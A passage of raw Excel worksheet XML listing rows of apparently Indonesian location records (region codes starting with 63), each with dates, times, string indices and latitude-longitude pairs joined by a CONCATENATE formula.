      <c r="C2680" s="2">
        <v>0.51675925925925925</v>
      </c>
      <c r="D2680" t="s">
        <v>22</v>
      </c>
      <c r="E2680" t="s">
        <v>23</v>
      </c>
      <c r="F2680" t="s">
        <v>9064</v>
      </c>
      <c r="G2680" t="s">
        <v>9065</v>
      </c>
      <c r="H2680" t="s">
        <v>26</v>
      </c>
      <c r="I2680" t="s">
        <v>3577</v>
      </c>
      <c r="J2680" t="s">
        <v>6509</v>
      </c>
      <c r="L2680" t="s">
        <v>9066</v>
      </c>
      <c r="M2680">
        <v>6307050007</v>
      </c>
      <c r="N2680">
        <v>6307050</v>
      </c>
      <c r="O2680">
        <v>6307</v>
      </c>
      <c r="P2680">
        <v>63</v>
      </c>
      <c r="Q2680" t="s">
        <v>8823</v>
      </c>
      <c r="R2680" t="s">
        <v>8817</v>
      </c>
      <c r="S2680" t="s">
        <v>8818</v>
      </c>
      <c r="T2680" t="s">
        <v>6513</v>
      </c>
      <c r="U2680" s="5">
        <v>11538254</v>
      </c>
      <c r="V2680" s="5" t="s">
        <v>16856</v>
      </c>
      <c r="W2680" s="5">
        <v>-258796</v>
      </c>
      <c r="X2680" t="s">
        <v>20596</v>
      </c>
      <c r="Y2680" t="str">
        <f t="shared" si="41"/>
        <v>-2.58796,115.38254</v>
      </c>
    </row>
    <row r="2681" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2681">
        <v>226343</v>
      </c>
      <c r="B2681" s="1">
        <v>44211</v>
      </c>
      <c r="C2681" s="2">
        <v>0.51746527777777784</v>
      </c>
      <c r="D2681" t="s">
        <v>22</v>
      </c>
      <c r="E2681" t="s">
        <v>23</v>
      </c>
      <c r="F2681" t="s">
        <v>9067</v>
      </c>
      <c r="H2681" t="s">
        <v>26</v>
      </c>
      <c r="I2681" t="s">
        <v>137</v>
      </c>
      <c r="J2681" t="s">
        <v>6509</v>
      </c>
      <c r="L2681" t="s">
        <v>9068</v>
      </c>
      <c r="M2681">
        <v>6372032004</v>
      </c>
      <c r="N2681">
        <v>6372032</v>
      </c>
      <c r="O2681">
        <v>6372</v>
      </c>
      <c r="P2681">
        <v>63</v>
      </c>
      <c r="Q2681" t="s">
        <v>9069</v>
      </c>
      <c r="R2681" t="s">
        <v>9070</v>
      </c>
      <c r="S2681" t="s">
        <v>8778</v>
      </c>
      <c r="T2681" t="s">
        <v>6513</v>
      </c>
      <c r="U2681" s="5">
        <v>11487050</v>
      </c>
      <c r="V2681" s="5" t="s">
        <v>16857</v>
      </c>
      <c r="W2681" s="5">
        <v>-345486</v>
      </c>
      <c r="X2681" t="s">
        <v>20597</v>
      </c>
      <c r="Y2681" t="str">
        <f t="shared" si="41"/>
        <v>-3.45486,114.87050</v>
      </c>
    </row>
    <row r="2682" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2682">
        <v>226344</v>
      </c>
      <c r="B2682" s="1">
        <v>44211</v>
      </c>
      <c r="C2682" s="2">
        <v>0.51822916666666663</v>
      </c>
      <c r="D2682" t="s">
        <v>22</v>
      </c>
      <c r="E2682" t="s">
        <v>23</v>
      </c>
      <c r="F2682" t="s">
        <v>9071</v>
      </c>
      <c r="H2682" t="s">
        <v>26</v>
      </c>
      <c r="I2682" t="s">
        <v>137</v>
      </c>
      <c r="J2682" t="s">
        <v>6509</v>
      </c>
      <c r="L2682" t="s">
        <v>9072</v>
      </c>
      <c r="M2682">
        <v>6371020014</v>
      </c>
      <c r="N2682">
        <v>6371020</v>
      </c>
      <c r="O2682">
        <v>6371</v>
      </c>
      <c r="P2682">
        <v>63</v>
      </c>
      <c r="Q2682" t="s">
        <v>8973</v>
      </c>
      <c r="R2682" t="s">
        <v>8795</v>
      </c>
      <c r="S2682" t="s">
        <v>6512</v>
      </c>
      <c r="T2682" t="s">
        <v>6513</v>
      </c>
      <c r="U2682" s="5">
        <v>11462634</v>
      </c>
      <c r="V2682" s="5" t="s">
        <v>16858</v>
      </c>
      <c r="W2682" s="5">
        <v>-333997</v>
      </c>
      <c r="X2682" t="s">
        <v>20598</v>
      </c>
      <c r="Y2682" t="str">
        <f t="shared" si="41"/>
        <v>-3.33997,114.62634</v>
      </c>
    </row>
    <row r="2683" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2683">
        <v>226345</v>
      </c>
      <c r="B2683" s="1">
        <v>44211</v>
      </c>
      <c r="C2683" s="2">
        <v>0.538599537037037</v>
      </c>
      <c r="D2683" t="s">
        <v>22</v>
      </c>
      <c r="E2683" t="s">
        <v>23</v>
      </c>
      <c r="F2683" t="s">
        <v>9073</v>
      </c>
      <c r="G2683" t="s">
        <v>9074</v>
      </c>
      <c r="H2683" t="s">
        <v>26</v>
      </c>
      <c r="I2683" t="s">
        <v>893</v>
      </c>
      <c r="J2683" t="s">
        <v>6509</v>
      </c>
      <c r="L2683" t="s">
        <v>9075</v>
      </c>
      <c r="M2683">
        <v>6303040001</v>
      </c>
      <c r="N2683">
        <v>6303040</v>
      </c>
      <c r="O2683">
        <v>6303</v>
      </c>
      <c r="P2683">
        <v>63</v>
      </c>
      <c r="Q2683" t="s">
        <v>8808</v>
      </c>
      <c r="R2683" t="s">
        <v>8809</v>
      </c>
      <c r="S2683" t="s">
        <v>8751</v>
      </c>
      <c r="T2683" t="s">
        <v>6513</v>
      </c>
      <c r="U2683" s="5">
        <v>11464319</v>
      </c>
      <c r="V2683" s="5" t="s">
        <v>16859</v>
      </c>
      <c r="W2683" s="5">
        <v>-331598</v>
      </c>
      <c r="X2683" t="s">
        <v>20599</v>
      </c>
      <c r="Y2683" t="str">
        <f t="shared" si="41"/>
        <v>-3.31598,114.64319</v>
      </c>
    </row>
    <row r="2684" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2684">
        <v>226346</v>
      </c>
      <c r="B2684" s="1">
        <v>44211</v>
      </c>
      <c r="C2684" s="2">
        <v>0.5387615740740741</v>
      </c>
      <c r="D2684" t="s">
        <v>22</v>
      </c>
      <c r="E2684" t="s">
        <v>23</v>
      </c>
      <c r="F2684" t="s">
        <v>9076</v>
      </c>
      <c r="G2684" t="s">
        <v>9077</v>
      </c>
      <c r="H2684" t="s">
        <v>26</v>
      </c>
      <c r="I2684" t="s">
        <v>834</v>
      </c>
      <c r="J2684" t="s">
        <v>6509</v>
      </c>
      <c r="L2684" t="s">
        <v>9078</v>
      </c>
      <c r="M2684">
        <v>6372020002</v>
      </c>
      <c r="N2684">
        <v>6372020</v>
      </c>
      <c r="O2684">
        <v>6372</v>
      </c>
      <c r="P2684">
        <v>63</v>
      </c>
      <c r="Q2684" t="s">
        <v>9038</v>
      </c>
      <c r="R2684" t="s">
        <v>9039</v>
      </c>
      <c r="S2684" t="s">
        <v>8778</v>
      </c>
      <c r="T2684" t="s">
        <v>6513</v>
      </c>
      <c r="U2684" s="5">
        <v>11483377</v>
      </c>
      <c r="V2684" s="5" t="s">
        <v>16860</v>
      </c>
      <c r="W2684" s="5">
        <v>-349986</v>
      </c>
      <c r="X2684" t="s">
        <v>20600</v>
      </c>
      <c r="Y2684" t="str">
        <f t="shared" si="41"/>
        <v>-3.49986,114.83377</v>
      </c>
    </row>
    <row r="2685" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2685">
        <v>226347</v>
      </c>
      <c r="B2685" s="1">
        <v>44211</v>
      </c>
      <c r="C2685" s="2">
        <v>0.54017361111111117</v>
      </c>
      <c r="D2685" t="s">
        <v>22</v>
      </c>
      <c r="E2685" t="s">
        <v>23</v>
      </c>
      <c r="F2685" t="s">
        <v>9079</v>
      </c>
      <c r="G2685" t="s">
        <v>9080</v>
      </c>
      <c r="H2685" t="s">
        <v>26</v>
      </c>
      <c r="I2685" t="s">
        <v>9081</v>
      </c>
      <c r="J2685" t="s">
        <v>6509</v>
      </c>
      <c r="L2685" t="s">
        <v>9082</v>
      </c>
      <c r="M2685">
        <v>6303020011</v>
      </c>
      <c r="N2685">
        <v>6303020</v>
      </c>
      <c r="O2685">
        <v>6303</v>
      </c>
      <c r="P2685">
        <v>63</v>
      </c>
      <c r="Q2685" t="s">
        <v>8874</v>
      </c>
      <c r="R2685" t="s">
        <v>8875</v>
      </c>
      <c r="S2685" t="s">
        <v>8751</v>
      </c>
      <c r="T2685" t="s">
        <v>6513</v>
      </c>
      <c r="U2685" s="5">
        <v>11467006</v>
      </c>
      <c r="V2685" s="5" t="s">
        <v>16861</v>
      </c>
      <c r="W2685" s="5">
        <v>-340651</v>
      </c>
      <c r="X2685" t="s">
        <v>20601</v>
      </c>
      <c r="Y2685" t="str">
        <f t="shared" si="41"/>
        <v>-3.40651,114.67006</v>
      </c>
    </row>
    <row r="2686" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2686">
        <v>226348</v>
      </c>
      <c r="B2686" s="1">
        <v>44211</v>
      </c>
      <c r="C2686" s="2">
        <v>0.54343750000000002</v>
      </c>
      <c r="D2686" t="s">
        <v>22</v>
      </c>
      <c r="E2686" t="s">
        <v>23</v>
      </c>
      <c r="F2686" t="s">
        <v>9083</v>
      </c>
      <c r="G2686" t="s">
        <v>9084</v>
      </c>
      <c r="H2686" t="s">
        <v>26</v>
      </c>
      <c r="I2686" t="s">
        <v>867</v>
      </c>
      <c r="J2686" t="s">
        <v>6509</v>
      </c>
      <c r="L2686" t="s">
        <v>9085</v>
      </c>
      <c r="M2686">
        <v>6303020011</v>
      </c>
      <c r="N2686">
        <v>6303020</v>
      </c>
      <c r="O2686">
        <v>6303</v>
      </c>
      <c r="P2686">
        <v>63</v>
      </c>
      <c r="Q2686" t="s">
        <v>8874</v>
      </c>
      <c r="R2686" t="s">
        <v>8875</v>
      </c>
      <c r="S2686" t="s">
        <v>8751</v>
      </c>
      <c r="T2686" t="s">
        <v>6513</v>
      </c>
      <c r="U2686" s="5">
        <v>11466820</v>
      </c>
      <c r="V2686" s="5" t="s">
        <v>16862</v>
      </c>
      <c r="W2686" s="5">
        <v>-340389</v>
      </c>
      <c r="X2686" t="s">
        <v>20602</v>
      </c>
      <c r="Y2686" t="str">
        <f t="shared" si="41"/>
        <v>-3.40389,114.66820</v>
      </c>
    </row>
    <row r="2687" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2687">
        <v>226349</v>
      </c>
      <c r="B2687" s="1">
        <v>44211</v>
      </c>
      <c r="C2687" s="2">
        <v>0.54656249999999995</v>
      </c>
      <c r="D2687" t="s">
        <v>22</v>
      </c>
      <c r="E2687" t="s">
        <v>23</v>
      </c>
      <c r="F2687" t="s">
        <v>9086</v>
      </c>
      <c r="G2687" t="s">
        <v>9087</v>
      </c>
      <c r="H2687" t="s">
        <v>26</v>
      </c>
      <c r="I2687" t="s">
        <v>1538</v>
      </c>
      <c r="J2687" t="s">
        <v>6509</v>
      </c>
      <c r="M2687">
        <v>6303030014</v>
      </c>
      <c r="N2687">
        <v>6303030</v>
      </c>
      <c r="O2687">
        <v>6303</v>
      </c>
      <c r="P2687">
        <v>63</v>
      </c>
      <c r="Q2687" t="s">
        <v>9088</v>
      </c>
      <c r="R2687" t="s">
        <v>9089</v>
      </c>
      <c r="S2687" t="s">
        <v>8751</v>
      </c>
      <c r="T2687" t="s">
        <v>6513</v>
      </c>
      <c r="U2687" s="5">
        <v>11462719</v>
      </c>
      <c r="V2687" s="5" t="s">
        <v>16863</v>
      </c>
      <c r="W2687" s="5">
        <v>-335303</v>
      </c>
      <c r="X2687" t="s">
        <v>20603</v>
      </c>
      <c r="Y2687" t="str">
        <f t="shared" si="41"/>
        <v>-3.35303,114.62719</v>
      </c>
    </row>
    <row r="2688" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2688">
        <v>226350</v>
      </c>
      <c r="B2688" s="1">
        <v>44211</v>
      </c>
      <c r="C2688" s="2">
        <v>0.55511574074074077</v>
      </c>
      <c r="D2688" t="s">
        <v>22</v>
      </c>
      <c r="E2688" t="s">
        <v>23</v>
      </c>
      <c r="F2688" t="s">
        <v>9090</v>
      </c>
      <c r="H2688" t="s">
        <v>26</v>
      </c>
      <c r="I2688" t="s">
        <v>1005</v>
      </c>
      <c r="J2688" t="s">
        <v>6509</v>
      </c>
      <c r="L2688" t="s">
        <v>9091</v>
      </c>
      <c r="M2688">
        <v>6303051007</v>
      </c>
      <c r="N2688">
        <v>6303051</v>
      </c>
      <c r="O2688">
        <v>6303</v>
      </c>
      <c r="P2688">
        <v>63</v>
      </c>
      <c r="Q2688" t="s">
        <v>9092</v>
      </c>
      <c r="R2688" t="s">
        <v>9093</v>
      </c>
      <c r="S2688" t="s">
        <v>8751</v>
      </c>
      <c r="T2688" t="s">
        <v>6513</v>
      </c>
      <c r="U2688" s="5">
        <v>11487093</v>
      </c>
      <c r="V2688" s="5" t="s">
        <v>16864</v>
      </c>
      <c r="W2688" s="5">
        <v>-335680</v>
      </c>
      <c r="X2688" t="s">
        <v>20604</v>
      </c>
      <c r="Y2688" t="str">
        <f t="shared" si="41"/>
        <v>-3.35680,114.87093</v>
      </c>
    </row>
    <row r="2689" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2689">
        <v>226351</v>
      </c>
      <c r="B2689" s="1">
        <v>44211</v>
      </c>
      <c r="C2689" s="2">
        <v>0.56108796296296293</v>
      </c>
      <c r="D2689" t="s">
        <v>22</v>
      </c>
      <c r="E2689" t="s">
        <v>23</v>
      </c>
      <c r="F2689" t="s">
        <v>9094</v>
      </c>
      <c r="H2689" t="s">
        <v>26</v>
      </c>
      <c r="I2689" t="s">
        <v>386</v>
      </c>
      <c r="J2689" t="s">
        <v>6509</v>
      </c>
      <c r="L2689" t="s">
        <v>9095</v>
      </c>
      <c r="M2689">
        <v>6372020002</v>
      </c>
      <c r="N2689">
        <v>6372020</v>
      </c>
      <c r="O2689">
        <v>6372</v>
      </c>
      <c r="P2689">
        <v>63</v>
      </c>
      <c r="Q2689" t="s">
        <v>9038</v>
      </c>
      <c r="R2689" t="s">
        <v>9039</v>
      </c>
      <c r="S2689" t="s">
        <v>8778</v>
      </c>
      <c r="T2689" t="s">
        <v>6513</v>
      </c>
      <c r="U2689" s="5">
        <v>11484553</v>
      </c>
      <c r="V2689" s="5" t="s">
        <v>16865</v>
      </c>
      <c r="W2689" s="5">
        <v>-350069</v>
      </c>
      <c r="X2689" t="s">
        <v>20605</v>
      </c>
      <c r="Y2689" t="str">
        <f t="shared" si="41"/>
        <v>-3.50069,114.84553</v>
      </c>
    </row>
    <row r="2690" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2690">
        <v>226352</v>
      </c>
      <c r="B2690" s="1">
        <v>44211</v>
      </c>
      <c r="C2690" s="2">
        <v>0.56214120370370368</v>
      </c>
      <c r="D2690" t="s">
        <v>22</v>
      </c>
      <c r="E2690" t="s">
        <v>23</v>
      </c>
      <c r="F2690" t="s">
        <v>9096</v>
      </c>
      <c r="G2690" t="s">
        <v>9097</v>
      </c>
      <c r="H2690" t="s">
        <v>26</v>
      </c>
      <c r="I2690" t="s">
        <v>1005</v>
      </c>
      <c r="J2690" t="s">
        <v>6509</v>
      </c>
      <c r="L2690" t="s">
        <v>250</v>
      </c>
      <c r="M2690">
        <v>6311031002</v>
      </c>
      <c r="N2690">
        <v>6311031</v>
      </c>
      <c r="O2690">
        <v>6311</v>
      </c>
      <c r="P2690">
        <v>63</v>
      </c>
      <c r="Q2690" t="s">
        <v>9098</v>
      </c>
      <c r="R2690" t="s">
        <v>9099</v>
      </c>
      <c r="S2690" t="s">
        <v>8934</v>
      </c>
      <c r="T2690" t="s">
        <v>6513</v>
      </c>
      <c r="U2690" s="5">
        <v>11560993</v>
      </c>
      <c r="V2690" s="5" t="s">
        <v>16866</v>
      </c>
      <c r="W2690" s="5">
        <v>-244172</v>
      </c>
      <c r="X2690" t="s">
        <v>20606</v>
      </c>
      <c r="Y2690" t="str">
        <f t="shared" si="41"/>
        <v>-2.44172,115.60993</v>
      </c>
    </row>
    <row r="2691" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2691">
        <v>226353</v>
      </c>
      <c r="B2691" s="1">
        <v>44211</v>
      </c>
      <c r="C2691" s="2">
        <v>0.56223379629629633</v>
      </c>
      <c r="D2691" t="s">
        <v>22</v>
      </c>
      <c r="E2691" t="s">
        <v>23</v>
      </c>
      <c r="F2691" t="s">
        <v>9100</v>
      </c>
      <c r="G2691" t="s">
        <v>9101</v>
      </c>
      <c r="H2691" t="s">
        <v>26</v>
      </c>
      <c r="I2691" t="s">
        <v>666</v>
      </c>
      <c r="J2691" t="s">
        <v>6509</v>
      </c>
      <c r="L2691" t="s">
        <v>9102</v>
      </c>
      <c r="M2691">
        <v>6303050003</v>
      </c>
      <c r="N2691">
        <v>6303050</v>
      </c>
      <c r="O2691">
        <v>6303</v>
      </c>
      <c r="P2691">
        <v>63</v>
      </c>
      <c r="Q2691" t="s">
        <v>8925</v>
      </c>
      <c r="R2691" t="s">
        <v>8759</v>
      </c>
      <c r="S2691" t="s">
        <v>8751</v>
      </c>
      <c r="T2691" t="s">
        <v>6513</v>
      </c>
      <c r="U2691" s="5">
        <v>11486148</v>
      </c>
      <c r="V2691" s="5" t="s">
        <v>16867</v>
      </c>
      <c r="W2691" s="5">
        <v>-340543</v>
      </c>
      <c r="X2691" t="s">
        <v>20607</v>
      </c>
      <c r="Y2691" t="str">
        <f t="shared" ref="Y2691:Y2754" si="42">CONCATENATE(X2691,",",V2691)</f>
        <v>-3.40543,114.86148</v>
      </c>
    </row>
    <row r="2692" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2692">
        <v>226354</v>
      </c>
      <c r="B2692" s="1">
        <v>44211</v>
      </c>
      <c r="C2692" s="2">
        <v>0.57423611111111106</v>
      </c>
      <c r="D2692" t="s">
        <v>22</v>
      </c>
      <c r="E2692" t="s">
        <v>23</v>
      </c>
      <c r="F2692" t="s">
        <v>9103</v>
      </c>
      <c r="G2692" t="s">
        <v>9104</v>
      </c>
      <c r="H2692" t="s">
        <v>26</v>
      </c>
      <c r="I2692" t="s">
        <v>193</v>
      </c>
      <c r="J2692" t="s">
        <v>6509</v>
      </c>
      <c r="L2692" t="s">
        <v>9105</v>
      </c>
      <c r="M2692">
        <v>6311040003</v>
      </c>
      <c r="N2692">
        <v>6311040</v>
      </c>
      <c r="O2692">
        <v>6311</v>
      </c>
      <c r="P2692">
        <v>63</v>
      </c>
      <c r="Q2692" t="s">
        <v>9106</v>
      </c>
      <c r="R2692" t="s">
        <v>9107</v>
      </c>
      <c r="S2692" t="s">
        <v>8934</v>
      </c>
      <c r="T2692" t="s">
        <v>6513</v>
      </c>
      <c r="U2692" s="5">
        <v>11553168</v>
      </c>
      <c r="V2692" s="5" t="s">
        <v>16868</v>
      </c>
      <c r="W2692" s="5">
        <v>-229936</v>
      </c>
      <c r="X2692" t="s">
        <v>20608</v>
      </c>
      <c r="Y2692" t="str">
        <f t="shared" si="42"/>
        <v>-2.29936,115.53168</v>
      </c>
    </row>
    <row r="2693" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2693">
        <v>226355</v>
      </c>
      <c r="B2693" s="1">
        <v>44211</v>
      </c>
      <c r="C2693" s="2">
        <v>0.57884259259259252</v>
      </c>
      <c r="D2693" t="s">
        <v>22</v>
      </c>
      <c r="E2693" t="s">
        <v>23</v>
      </c>
      <c r="F2693" t="s">
        <v>9108</v>
      </c>
      <c r="G2693" t="s">
        <v>9109</v>
      </c>
      <c r="H2693" t="s">
        <v>26</v>
      </c>
      <c r="I2693" t="s">
        <v>487</v>
      </c>
      <c r="J2693" t="s">
        <v>6509</v>
      </c>
      <c r="M2693">
        <v>6307080009</v>
      </c>
      <c r="N2693">
        <v>6307080</v>
      </c>
      <c r="O2693">
        <v>6307</v>
      </c>
      <c r="P2693">
        <v>63</v>
      </c>
      <c r="Q2693" t="s">
        <v>9110</v>
      </c>
      <c r="R2693" t="s">
        <v>9111</v>
      </c>
      <c r="S2693" t="s">
        <v>8818</v>
      </c>
      <c r="T2693" t="s">
        <v>6513</v>
      </c>
      <c r="U2693" s="5">
        <v>11537334</v>
      </c>
      <c r="V2693" s="5" t="s">
        <v>16869</v>
      </c>
      <c r="W2693" s="5">
        <v>-258703</v>
      </c>
      <c r="X2693" t="s">
        <v>20609</v>
      </c>
      <c r="Y2693" t="str">
        <f t="shared" si="42"/>
        <v>-2.58703,115.37334</v>
      </c>
    </row>
    <row r="2694" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2694">
        <v>226356</v>
      </c>
      <c r="B2694" s="1">
        <v>44211</v>
      </c>
      <c r="C2694" s="2">
        <v>0.59969907407407408</v>
      </c>
      <c r="D2694" t="s">
        <v>22</v>
      </c>
      <c r="E2694" t="s">
        <v>23</v>
      </c>
      <c r="F2694" t="s">
        <v>9112</v>
      </c>
      <c r="G2694" t="s">
        <v>9113</v>
      </c>
      <c r="H2694" t="s">
        <v>26</v>
      </c>
      <c r="I2694" t="s">
        <v>65</v>
      </c>
      <c r="J2694" t="s">
        <v>6509</v>
      </c>
      <c r="L2694" t="s">
        <v>9114</v>
      </c>
      <c r="M2694">
        <v>6304060007</v>
      </c>
      <c r="N2694">
        <v>6304060</v>
      </c>
      <c r="O2694">
        <v>6304</v>
      </c>
      <c r="P2694">
        <v>63</v>
      </c>
      <c r="Q2694" t="s">
        <v>8849</v>
      </c>
      <c r="R2694" t="s">
        <v>8850</v>
      </c>
      <c r="S2694" t="s">
        <v>8851</v>
      </c>
      <c r="T2694" t="s">
        <v>6513</v>
      </c>
      <c r="U2694" s="5">
        <v>11461620</v>
      </c>
      <c r="V2694" s="5" t="s">
        <v>16870</v>
      </c>
      <c r="W2694" s="5">
        <v>-324966</v>
      </c>
      <c r="X2694" t="s">
        <v>20610</v>
      </c>
      <c r="Y2694" t="str">
        <f t="shared" si="42"/>
        <v>-3.24966,114.61620</v>
      </c>
    </row>
    <row r="2695" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2695">
        <v>226357</v>
      </c>
      <c r="B2695" s="1">
        <v>44211</v>
      </c>
      <c r="C2695" s="2">
        <v>0.61028935185185185</v>
      </c>
      <c r="D2695" t="s">
        <v>22</v>
      </c>
      <c r="E2695" t="s">
        <v>23</v>
      </c>
      <c r="F2695" t="s">
        <v>9115</v>
      </c>
      <c r="H2695" t="s">
        <v>26</v>
      </c>
      <c r="I2695" t="s">
        <v>271</v>
      </c>
      <c r="J2695" t="s">
        <v>6509</v>
      </c>
      <c r="L2695" t="s">
        <v>9116</v>
      </c>
      <c r="M2695">
        <v>6371010006</v>
      </c>
      <c r="N2695">
        <v>6371010</v>
      </c>
      <c r="O2695">
        <v>6371</v>
      </c>
      <c r="P2695">
        <v>63</v>
      </c>
      <c r="Q2695" t="s">
        <v>8804</v>
      </c>
      <c r="R2695" t="s">
        <v>6511</v>
      </c>
      <c r="S2695" t="s">
        <v>6512</v>
      </c>
      <c r="T2695" t="s">
        <v>6513</v>
      </c>
      <c r="U2695" s="5">
        <v>11461105</v>
      </c>
      <c r="V2695" s="5" t="s">
        <v>16871</v>
      </c>
      <c r="W2695" s="5">
        <v>-336396</v>
      </c>
      <c r="X2695" t="s">
        <v>20611</v>
      </c>
      <c r="Y2695" t="str">
        <f t="shared" si="42"/>
        <v>-3.36396,114.61105</v>
      </c>
    </row>
    <row r="2696" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2696">
        <v>226358</v>
      </c>
      <c r="B2696" s="1">
        <v>44211</v>
      </c>
      <c r="C2696" s="2">
        <v>0.62129629629629635</v>
      </c>
      <c r="D2696" t="s">
        <v>22</v>
      </c>
      <c r="E2696" t="s">
        <v>23</v>
      </c>
      <c r="F2696" t="s">
        <v>9117</v>
      </c>
      <c r="G2696" t="s">
        <v>9118</v>
      </c>
      <c r="H2696" t="s">
        <v>26</v>
      </c>
      <c r="I2696" t="s">
        <v>886</v>
      </c>
      <c r="J2696" t="s">
        <v>6509</v>
      </c>
      <c r="L2696" t="s">
        <v>9119</v>
      </c>
      <c r="M2696">
        <v>6303050002</v>
      </c>
      <c r="N2696">
        <v>6303050</v>
      </c>
      <c r="O2696">
        <v>6303</v>
      </c>
      <c r="P2696">
        <v>63</v>
      </c>
      <c r="Q2696" t="s">
        <v>8758</v>
      </c>
      <c r="R2696" t="s">
        <v>8759</v>
      </c>
      <c r="S2696" t="s">
        <v>8751</v>
      </c>
      <c r="T2696" t="s">
        <v>6513</v>
      </c>
      <c r="U2696" s="5">
        <v>11485210</v>
      </c>
      <c r="V2696" s="5" t="s">
        <v>16872</v>
      </c>
      <c r="W2696" s="5">
        <v>-341427</v>
      </c>
      <c r="X2696" t="s">
        <v>20612</v>
      </c>
      <c r="Y2696" t="str">
        <f t="shared" si="42"/>
        <v>-3.41427,114.85210</v>
      </c>
    </row>
    <row r="2697" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2697">
        <v>226359</v>
      </c>
      <c r="B2697" s="1">
        <v>44211</v>
      </c>
      <c r="C2697" s="2">
        <v>0.62442129629629628</v>
      </c>
      <c r="D2697" t="s">
        <v>22</v>
      </c>
      <c r="E2697" t="s">
        <v>23</v>
      </c>
      <c r="F2697" t="s">
        <v>9120</v>
      </c>
      <c r="G2697" t="s">
        <v>9121</v>
      </c>
      <c r="H2697" t="s">
        <v>26</v>
      </c>
      <c r="I2697" t="s">
        <v>27</v>
      </c>
      <c r="J2697" t="s">
        <v>6509</v>
      </c>
      <c r="L2697" t="s">
        <v>9122</v>
      </c>
      <c r="M2697">
        <v>6371040012</v>
      </c>
      <c r="N2697">
        <v>6371040</v>
      </c>
      <c r="O2697">
        <v>6371</v>
      </c>
      <c r="P2697">
        <v>63</v>
      </c>
      <c r="Q2697" t="s">
        <v>8901</v>
      </c>
      <c r="R2697" t="s">
        <v>8782</v>
      </c>
      <c r="S2697" t="s">
        <v>6512</v>
      </c>
      <c r="T2697" t="s">
        <v>6513</v>
      </c>
      <c r="U2697" s="5">
        <v>11461429</v>
      </c>
      <c r="V2697" s="5" t="s">
        <v>16873</v>
      </c>
      <c r="W2697" s="5">
        <v>-329321</v>
      </c>
      <c r="X2697" t="s">
        <v>20613</v>
      </c>
      <c r="Y2697" t="str">
        <f t="shared" si="42"/>
        <v>-3.29321,114.61429</v>
      </c>
    </row>
    <row r="2698" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2698">
        <v>226360</v>
      </c>
      <c r="B2698" s="1">
        <v>44211</v>
      </c>
      <c r="C2698" s="2">
        <v>0.62482638888888886</v>
      </c>
      <c r="D2698" t="s">
        <v>22</v>
      </c>
      <c r="E2698" t="s">
        <v>23</v>
      </c>
      <c r="F2698" t="s">
        <v>9123</v>
      </c>
      <c r="G2698" t="s">
        <v>9124</v>
      </c>
      <c r="H2698" t="s">
        <v>26</v>
      </c>
      <c r="I2698" t="s">
        <v>137</v>
      </c>
      <c r="J2698" t="s">
        <v>6509</v>
      </c>
      <c r="L2698" t="s">
        <v>9125</v>
      </c>
      <c r="M2698">
        <v>6303050002</v>
      </c>
      <c r="N2698">
        <v>6303050</v>
      </c>
      <c r="O2698">
        <v>6303</v>
      </c>
      <c r="P2698">
        <v>63</v>
      </c>
      <c r="Q2698" t="s">
        <v>8758</v>
      </c>
      <c r="R2698" t="s">
        <v>8759</v>
      </c>
      <c r="S2698" t="s">
        <v>8751</v>
      </c>
      <c r="T2698" t="s">
        <v>6513</v>
      </c>
      <c r="U2698" s="5">
        <v>11485336</v>
      </c>
      <c r="V2698" s="5" t="s">
        <v>16874</v>
      </c>
      <c r="W2698" s="5">
        <v>-341196</v>
      </c>
      <c r="X2698" t="s">
        <v>20614</v>
      </c>
      <c r="Y2698" t="str">
        <f t="shared" si="42"/>
        <v>-3.41196,114.85336</v>
      </c>
    </row>
    <row r="2699" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2699">
        <v>226361</v>
      </c>
      <c r="B2699" s="1">
        <v>44211</v>
      </c>
      <c r="C2699" s="2">
        <v>0.66270833333333334</v>
      </c>
      <c r="D2699" t="s">
        <v>22</v>
      </c>
      <c r="E2699" t="s">
        <v>23</v>
      </c>
      <c r="F2699" t="s">
        <v>9126</v>
      </c>
      <c r="G2699" t="s">
        <v>9127</v>
      </c>
      <c r="H2699" t="s">
        <v>26</v>
      </c>
      <c r="I2699" t="s">
        <v>1498</v>
      </c>
      <c r="J2699" t="s">
        <v>6509</v>
      </c>
      <c r="L2699" t="s">
        <v>9128</v>
      </c>
      <c r="M2699">
        <v>6307050006</v>
      </c>
      <c r="N2699">
        <v>6307050</v>
      </c>
      <c r="O2699">
        <v>6307</v>
      </c>
      <c r="P2699">
        <v>63</v>
      </c>
      <c r="Q2699" t="s">
        <v>9129</v>
      </c>
      <c r="R2699" t="s">
        <v>8817</v>
      </c>
      <c r="S2699" t="s">
        <v>8818</v>
      </c>
      <c r="T2699" t="s">
        <v>6513</v>
      </c>
      <c r="U2699" s="5">
        <v>11538177</v>
      </c>
      <c r="V2699" s="5" t="s">
        <v>16875</v>
      </c>
      <c r="W2699" s="5">
        <v>-258623</v>
      </c>
      <c r="X2699" t="s">
        <v>20615</v>
      </c>
      <c r="Y2699" t="str">
        <f t="shared" si="42"/>
        <v>-2.58623,115.38177</v>
      </c>
    </row>
    <row r="2700" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A2700">
        <v>226362</v>
      </c>
      <c r="B2700" s="1">
        <v>44211</v>
      </c>
      <c r="C2700" s="2">
        <v>0.6699652777777777</v>
      </c>
      <c r="D2700" t="s">
        <v>22</v>
      </c>
      <c r="E2700" t="s">
        <v>23</v>
      </c>
      <c r="F2700" t="s">
        <v>9130</v>
      </c>
      <c r="G2700" t="s">
        <v>9131</v>
      </c>
      <c r="H2700" t="s">
        <v>26</v>
      </c>
      <c r="I2700" t="s">
        <v>1340</v>
      </c>
      <c r="J2700" t="s">
